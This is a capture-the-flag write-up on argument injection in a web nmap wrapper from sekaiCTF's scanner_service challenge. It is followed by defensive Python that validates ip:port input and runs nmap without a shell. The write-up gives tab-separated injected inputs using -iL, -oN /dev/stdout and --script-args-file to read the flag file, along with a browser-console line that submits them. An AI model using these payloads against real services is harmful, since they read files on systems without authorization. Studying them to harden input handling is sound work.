
Shell

Nmap

For sekaiCTF's scanner_service challenge, the webpage passes your ip_address:port input to

nmap -p port ip_address
and then prints stdout (I tried doing stuff with -iL, but it errored out and sent it to stderr instead)

~~^someone solved it with iL though, I just don't remember how~~

0.0.0.0:1337\t-iL\t/flag-????????????????????????????????.txt\t-oN\t/dev/stdout

from https://discord.com/channels/1004529434092654663/1093762384012771391/1145794495334580234

Anyway, anything you add after the port ends up in the command line as extra nmap CLI arguments:

For example, 127.0.0.1:80 --abcd would become

nmap -p 80 --abcd 127.0.0.1
However, because the server escapes spaces (and a bunch of other characters), you can use tabs instead as the whitespace between arguments; they still split into separate arguments but are not caught by the escaping:
document.getElementById("yee").value = "127.0.0.1:80 --script http-favicon --script-args-file /flag.txt -dddddd".replaceAll(" ", "\t")
You can do the same thing with requests in Python and make the POST request yourself, but adding an id to the HTML input element and pasting that line into the browser inspector console works too.

In this case, the flag file wasn't just flag.txt (I don't remember what it was), but the challenge gave you the source for how it generated the filename, so you could just use flag-???.txt instead, with as many ? wildcards as the generated filename had characters.

I don't think it matters what script you put as long as it takes arguments

Also, you can repeat -v or -d to raise the verbosity/debug level and get more output.

The output looked something like this:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-28 09:14 PDT
NSE: args = flag{yeeeeeeee},
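The root cause here is that the service escaped characters in the raw ip:port string instead of validating it, and then let the string be split into nmap arguments. The following is an added example (not the challenge's code) of how the input handling should have been written: parse ip:port strictly, reject anything else, and hand nmap an argv list with no shell in between. The function names and the 60-second timeout are assumptions.

```python
import ipaddress
import re
import subprocess
from typing import List, Tuple

# Only an IPv4 dotted quad, one colon, and 1-5 digits. No whitespace of any
# kind (spaces, tabs, newlines), no dashes, no slashes, so nothing can become
# a second argument, an option, or a path.
_TARGET = re.compile(r"\A(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\Z")

def parse_target(user_input: str) -> Tuple[str, int]:
    """Return (ip, port) for a well-formed 'ip:port', else raise ValueError."""
    m = _TARGET.match(user_input)
    if m is None:
        raise ValueError("expected ip_address:port and nothing else")
    # IPv4Address rejects octets > 255; AddressValueError is a ValueError.
    ip = str(ipaddress.IPv4Address(m.group(1)))
    port = int(m.group(2))
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    return ip, port

def is_valid_target(user_input: str) -> bool:
    """Boolean view of parse_target, convenient for request validation."""
    try:
        parse_target(user_input)
        return True
    except ValueError:
        return False

def build_nmap_argv(user_input: str) -> List[str]:
    """Build the exact argv the scanner should execute: fixed shape, two
    validated values, nothing copied through from the raw request string."""
    ip, port = parse_target(user_input)
    return ["nmap", "-p", str(port), ip]

def run_scan(user_input: str) -> str:
    """Run nmap without a shell: the list form means no word splitting,
    no glob expansion, and no escaping rules to get wrong."""
    argv = build_nmap_argv(user_input)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=60)
    return proc.stdout
```

With this in place the tab trick from the writeup is rejected before any command is built, because the validator never tries to neutralise bad characters, it only accepts a known-good shape.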